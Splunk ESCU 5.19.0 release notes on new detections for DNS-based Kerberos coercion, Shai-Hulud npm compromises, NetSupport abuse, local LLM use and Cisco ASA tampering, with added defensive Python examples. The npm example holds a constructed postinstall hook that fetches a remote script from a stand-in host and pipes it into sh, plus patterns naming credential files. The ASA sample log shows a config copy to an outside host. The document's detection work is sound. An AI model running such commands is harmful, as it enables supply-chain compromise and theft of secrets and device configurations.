What's new

ESCU version 5.19.0 was released on December 10th, 2025.

Key highlights

ESCU 5.19 delivers major advancements in detecting supply chain attacks, identity coercion techniques, unauthorized AI usage, and network infrastructure compromise, areas where many organizations continue to face blind spots. This release introduces full analytic coverage for the npm Shai-Hulud ecosystem compromises, giving defenders early visibility into malicious package lifecycle hooks, GitHub workflow tampering, and cross-platform exfiltration behaviors that often unfold silently inside CI/CD pipelines. We also add comprehensive detections for the newly disclosed Kerberos Coercion with DNS (CVE-2025-33073) technique, enabling SOCs to identify DNS-triggered authentication coercion that can lead to credential relay or privilege escalation inside Active Directory environments. New analytics for NetSupport RMM tool abuse help teams distinguish legitimate remote administration from covert access, uncovering renamed binaries, registry manipulation, and stealthy persistence chains.

This release also expands visibility into Shadow AI by detecting unauthorized deployment of local LLM frameworks (Ollama, GPT4All, LM Studio, llama.cpp, and others), providing defenders with early warning before unmonitored AI runtimes become channels for data exposure or endpoint abuse.

Finally, ESCU 5.19 represents the next step in the Splunk + Cisco Better Together story, introducing the most extensive set of Cisco ASA security analytics we have released to date. These detections provide deep visibility into configuration tampering, suppressed logging, packet capture activation, identity misuse, and administrative command reconnaissance (behaviors that often precede firewall takeover, data exfiltration, and boundary manipulation). By bringing ASA telemetry into the same analytic ecosystem as NVM, FTD, Duo, Umbrella, and Talos-driven rapid responses, Splunk now offers customers a more unified and high-fidelity view of adversary behavior across the network control plane.

Together, these updates help customers detect high-impact threats earlier, correlate activity across identity, CI/CD, endpoint, LLM, and network layers, and strengthen their ability to respond quickly to emerging tradecraft across modern enterprise environments.

Following is a summary of the latest updates:

  • Kerberos Coercion with DNS (CVE-2025-33073): Introduced a new analytic story — Kerberos Coercion with DNS — along with detections addressing the recently disclosed CVE-2025-33073 vulnerability. These analytics identify coercion attempts where attackers leverage DNS records to trigger Kerberos authentication from remote hosts, a technique that can lead to credential relay or domain privilege escalation. New detections — Windows Short-Lived DNS Record, Windows Kerberos Coercion via DNS, Windows Credential Target Information Structure in Command Line, and DNS Kerberos Coercion — provide end-to-end visibility into DNS-based coercion behaviors across authentication and name resolution events.
  • NPM Supply Chain Compromise (Shai-Hulud Campaigns): Expanded detection coverage for npm ecosystem supply chain compromises, addressing both the Shai-Hulud 2.0 worm campaign and recurring lifecycle hook abuse patterns. This update adds analytics to detect malicious npm package installations that execute arbitrary scripts through preinstall, install, postinstall, or prepare hooks — a long-standing risk vector exploited in major incidents from event-stream (2018) to ua-parser-js (2021) and Shai-Hulud (2025). New detections — Shai-Hulud Workflow File Modification, Shai-Hulud 2.0 Exfiltration Artifacts, and Suspicious GitHub Workflow Creation — monitor file creation, credential theft, and GitHub workflow tampering behaviors, enhancing visibility into cross-platform supply chain compromise and credential exfiltration in CI/CD environments.
  • NetSupport RMM Tool Abuse: Strengthened detection coverage for malicious use of the NetSupport Manager RMM tool, which adversaries frequently deploy for covert remote access under the guise of legitimate remote-support activity. New analytics identify NetSupport’s presence through loaded module patterns, executable masquerading, and registry manipulation, including detections for Windows Deletion of Most Recent Used Command via Registry, Executable Masquerading as Benign File Types, and NetSupport RMM Loaded Modules. These complement updated credential-theft coverage in Windows Credentials From Password Stores (Creation/Deletion) to surface cases where NetSupport is deployed as part of a broader credential access or persistence chain. Together, these analytics help distinguish authorized IT administration from unauthorized NetSupport-based intrusions involving renamed binaries, PowerShell-assisted deployment, suspicious startup locations, and stealthy remote control sessions.
  • Suspicious Local LLM Frameworks: Added new analytics to address the rise of Shadow AI — unauthorized deployment of local Large Language Model (LLM) frameworks such as Ollama, LM Studio, GPT4All, Jan, llama.cpp, and KoboldCPP inside enterprise environments. These tools allow users to run powerful models locally, creating blind spots for data exfiltration, policy violations, and unmonitored processing of sensitive information. New detections — LLM Model File Creation, Local LLM Framework DNS Query, and Windows Local LLM Framework Execution — monitor model file downloads (.gguf, .ggml, safetensors), suspicious process execution, and DNS lookups to model repositories. By correlating Windows Security logs and Sysmon telemetry, this coverage helps security teams uncover unauthorized AI usage, assess data exposure risks, and enforce AI governance before Shadow AI frameworks evolve into channels for covert data handling or persistent endpoint abuse.
  • Suspicious Cisco ASA Activity: Expanded detection coverage for malicious or unauthorized activity on Cisco Adaptive Security Appliances (ASA), focusing on configuration tampering, credential misuse, and covert administrative behaviors often seen in targeted network compromise and firewall takeover scenarios. New analytics surface high-risk events including AAA policy modification, logging filter tampering, logging message suppression, packet capture activation, and device file copy operations — both locally and to remote destinations. Additional detections highlight identity-based abuse such as new local user account creation, user deletion, privilege level changes, and lockout threshold anomalies, along with reconnaissance command usage that may reveal adversary staging or pre-attack mapping. Together, these detections enhance visibility into attempts to weaken audit controls, establish persistence, exfiltrate configuration data, or manipulate security boundaries on Cisco ASA devices.
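
The "short-lived DNS record" behavior named in the Kerberos Coercion with DNS story is simple to express outside of SPL. The following Python is an added example, not an ESCU search and not code from Splunk: it pairs record-creation and record-deletion events from a constructed DNS audit log (the field names `ts`, `action`, `zone`, `name`, `data`, `user` are assumptions, not a real product's schema) and reports any record that was removed within a configurable window of being created. Correlating the finding with authentication events from the same window is left to the SIEM.

```python
"""Flag short-lived DNS records in constructed zone-change events.

Added example, not an ESCU search: the events are constructed and only
loosely modeled on a DNS server's record-audit log (field names are an
assumption). A record that is created and then removed within minutes is the
"short-lived record" behaviour described in the release notes.
"""
from datetime import datetime, timedelta

# Constructed events: one record that lives a day, one that lives 65 seconds.
EVENTS = [
    {"ts": "2025-12-10T09:00:00", "action": "created", "zone": "corp.example",
     "name": "printer07", "data": "10.0.0.44", "user": "svc_dns"},
    {"ts": "2025-12-10T09:00:05", "action": "created", "zone": "corp.example",
     "name": "ws-1a2b", "data": "10.0.0.99", "user": "jdoe"},
    {"ts": "2025-12-10T09:01:10", "action": "deleted", "zone": "corp.example",
     "name": "ws-1a2b", "data": "10.0.0.99", "user": "jdoe"},
    {"ts": "2025-12-11T09:00:00", "action": "deleted", "zone": "corp.example",
     "name": "printer07", "data": "10.0.0.44", "user": "svc_dns"},
]


def short_lived_records(events, max_lifetime=timedelta(minutes=10)):
    """Return (zone, name, creator, lifetime_seconds) for every record that was
    deleted within max_lifetime of its creation. Events may arrive unordered;
    the ISO-8601 timestamps sort correctly as strings."""
    pending = {}   # (zone, name, data) -> the creation event still awaiting a delete
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["zone"].lower(), ev["name"].lower(), ev["data"])
        if ev["action"] == "created":
            pending[key] = ev
        elif ev["action"] == "deleted" and key in pending:
            created = pending.pop(key)
            lifetime = (datetime.fromisoformat(ev["ts"])
                        - datetime.fromisoformat(created["ts"]))
            if lifetime <= max_lifetime:
                findings.append((ev["zone"], ev["name"], created["user"],
                                 int(lifetime.total_seconds())))
    return findings


if __name__ == "__main__":
    for zone, name, user, secs in short_lived_records(EVENTS):
        print(f"short-lived record {name}.{zone} created by {user}, lived {secs}s")
```

Tune `max_lifetime` to the environment: DHCP-driven dynamic updates legitimately churn records, so a very small window (minutes) combined with a creator that is not the DHCP or DNS service account is a far better signal than record deletion alone.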
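
The npm lifecycle-hook risk described under the Shai-Hulud bullet can be audited before a package ever reaches a build agent. The Python below is an added example, not one of the ESCU detections and not code from the Shai-Hulud research: it reads a `package.json`, pulls out the `preinstall`, `install`, `postinstall` and `prepare` scripts that npm runs automatically during installation, and flags commands matching a small, constructed set of indicator patterns (remote fetch, inline interpreter execution, encoded payloads, reads of credential files). Both sample manifests are constructed.

```python
"""Audit an npm package manifest for risky lifecycle-hook scripts.

Added example (not part of the ESCU release): scans the "scripts" block of a
package.json for the hooks npm runs on install and flags commands that look
like they fetch or evaluate code at install time. Pattern list and sample
manifests are constructed for illustration.
"""
import json
import re

# Hooks npm executes automatically as part of `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed indicator patterns; a hook matching any of these deserves review.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
    "inline_eval": re.compile(
        r"\b(node|python3?|sh|bash|powershell)\s+-(e|c|Command)\b", re.I),
    "encoded_payload": re.compile(r"\b(base64|-EncodedCommand|-enc)\b", re.I),
    "credential_read": re.compile(
        r"(\.npmrc|\.git-credentials|AWS_SECRET|GITHUB_TOKEN)", re.I),
}


def audit_manifest(manifest_text):
    """Return [(hook, command, [matched pattern names])] for every lifecycle
    hook present in the manifest, flagged or not."""
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd)]
        findings.append((hook, cmd, hits))
    return findings


def risky_hooks(manifest_text):
    """Only the hooks that matched at least one indicator."""
    return [f for f in audit_manifest(manifest_text) if f[2]]


# Constructed sample manifests: a normal build hook and a fetch-and-run hook.
BENIGN = json.dumps({
    "name": "example-lib", "version": "1.0.0",
    "scripts": {"build": "tsc", "prepare": "npm run build", "test": "jest"},
})
SUSPECT = json.dumps({
    "name": "example-lib", "version": "1.0.1",
    "scripts": {"postinstall":
                "node -e \"require('child_process')"
                ".exec('curl -s https://example.invalid/x.sh | sh')\""},
})

if __name__ == "__main__":
    for label, manifest in (("benign", BENIGN), ("suspect", SUSPECT)):
        for hook, cmd, hits in audit_manifest(manifest):
            print(f"[{label}] {hook}: {cmd!r} -> {hits or 'no indicators'}")
```

A pattern list like this only catches the obvious cases; in a CI pipeline the stronger control is `npm ci --ignore-scripts` (a real npm flag) for packages that do not need native builds, with this audit used to decide which dependencies genuinely require their hooks.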
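
The Cisco ASA behaviors listed above (logging suppression, packet capture activation, file copy, AAA and local account changes, reconnaissance commands) all surface as command-execution syslog messages, so a first-pass triage can be done on the raw lines. The Python below is an added example, neither an ESCU search nor Cisco code: the line shape is modeled on ASA message IDs 111008 and 111010, but the exact wording is an assumption that should be checked against a real device, and the command-prefix patterns are assumptions drawn from common ASA CLI syntax. All sample lines are constructed.

```python
"""Triage Cisco ASA command-execution syslog lines into behaviour categories.

Added example (not an ESCU search, not Cisco code). The regex assumes the
message shape of ASA IDs 111008/111010; verify against your own devices,
since quoting and field order can differ between software versions.
"""
import re
from collections import Counter

LINE_RX = re.compile(
    r"%ASA-\d-(?P<id>111008|111010): User '(?P<user>[^']+)'"
    r"(?:, running '(?P<app>[^']*)' from IP '(?P<ip>[^']*)')?"
    r",? executed (?:the )?'(?P<cmd>[^']+)'(?: command)?\.?"
)

# Behaviour categories from the release notes; first match wins.
# Command prefixes are assumptions based on common ASA CLI syntax.
CATEGORIES = [
    ("logging_tampering", re.compile(r"^(no logging\b|logging message \d+)", re.I)),
    ("packet_capture",    re.compile(r"^capture\b", re.I)),
    ("file_copy",         re.compile(r"^copy\b", re.I)),
    ("aaa_policy_change", re.compile(r"^(no )?aaa\b", re.I)),
    ("local_account",     re.compile(r"^(no )?username\b", re.I)),
    ("recon_command",     re.compile(
        r"^show (running-config|conn|xlate|arp|route|vpn-sessiondb|access-list)\b", re.I)),
]


def classify(cmd):
    """Map an executed command to a category name, or None if uninteresting."""
    for name, rx in CATEGORIES:
        if rx.search(cmd):
            return name
    return None


def triage(lines):
    """Parse command-execution messages; other ASA messages are skipped."""
    rows = []
    for line in lines:
        m = LINE_RX.search(line)
        if not m:
            continue
        rows.append({"user": m["user"], "ip": m["ip"] or "console",
                     "cmd": m["cmd"], "category": classify(m["cmd"])})
    return rows


def summarize(lines):
    """Count flagged commands per category; unclassified commands are dropped."""
    return Counter(r["category"] for r in triage(lines) if r["category"])


# Constructed sample log, one benign connection message plus six commands.
SAMPLE_LOG = [
    "%ASA-6-302013: Built inbound TCP connection 12345 for outside:198.51.100.7/443",
    "%ASA-5-111008: User 'enable_15' executed the 'configure terminal' command.",
    "%ASA-5-111010: User 'admin', running 'CLI' from IP '10.1.1.5', executed 'no logging message 111008'",
    "%ASA-5-111010: User 'admin', running 'CLI' from IP '10.1.1.5', executed 'capture c1 interface inside'",
    "%ASA-5-111010: User 'admin', running 'CLI' from IP '10.1.1.5', executed 'copy running-config tftp://203.0.113.9/asa.cfg'",
    "%ASA-5-111010: User 'admin', running 'CLI' from IP '10.1.1.5', executed 'username tmpadmin privilege 15'",
    "%ASA-5-111010: User 'admin', running 'CLI' from IP '10.1.1.5', executed 'show running-config'",
]

if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(f"{row['user']}@{row['ip']}: {row['cmd']!r} -> {row['category']}")
    print(dict(summarize(SAMPLE_LOG)))
```

The value is in the sequence rather than any single line: a session that suppresses the very message IDs this parser relies on, then starts a capture and copies the running configuration off-box, is the pattern the release describes, so group rows by `user` and `ip` and look at ordering within the session rather than alerting on each category in isolation.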

These additions strengthen security teams' ability to detect and respond to emerging threats across critical enterprise platforms.

New analytics

Other updates

  • Updated search logic for the `Execution of File with Multiple Extensions` detection (External Contributor: jakeenea51)

  • Updated search logic for the `Suspicious mshta child process` detection to remove duplicates (External Contributor: DipsyTipsy)